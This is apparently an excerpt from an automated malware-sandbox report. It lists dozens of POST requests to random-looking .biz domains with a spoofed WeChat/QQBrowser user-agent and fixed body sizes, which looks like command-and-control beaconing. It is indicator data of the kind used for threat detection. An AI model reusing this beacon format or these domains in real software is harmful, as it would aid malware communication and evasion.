                        Source: global trafficHTTP traffic detected: POST /bwancadkaqtlbx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /fanvkuxv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /ix HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /vxsjaatihrjtd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /qvkbehfy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /rujiughdxo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /bhfem HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /qlckdyepimpj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ityan HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /mfjpaqkdwglsvxqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /qowwyqvurlxrxabk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /tdrxmaergnh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /afeeapyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /obhmtmpkhrufyuif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /rwhorjnmac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /rgh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ovwvug HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /tgeilwrmlsau HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /snkuws HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /hchtqxq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /cf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /qirtwake HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /lveagfnoqbuq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /rsstpsksfhdhf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /knaxcyr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /ivdmudcsfvhy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /ydpeotimwcfnew HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /tssrdd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /nhvixgstciqyn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /lameuyxyl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /qcgjfxceqsgou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /tfuhaffhj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /fx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /tmdyfv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /yk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /fmrmh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /cngo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /wikoehfueo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /iih HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /kykfeohkixf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /ybxut HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /yadhctxanlnpjhwu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /aloksmnh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /xflcwjjwcbmi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /xnjeybrqhb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /sbplnevnaxjj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /qtclvagsdhvow HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /snxddmvolovsghk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /glquerlqdouqshy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /vnho HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ow HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /hbbreaeoihjkosw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /kaok HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /gcbuytwgypg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /cm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /iuaudncacnnpxx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /biwgwfhxqj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /dgclnsuj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /ra HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /hmfdteob HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /roaragruci HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /opniaqqvrov HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /wtuuhs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
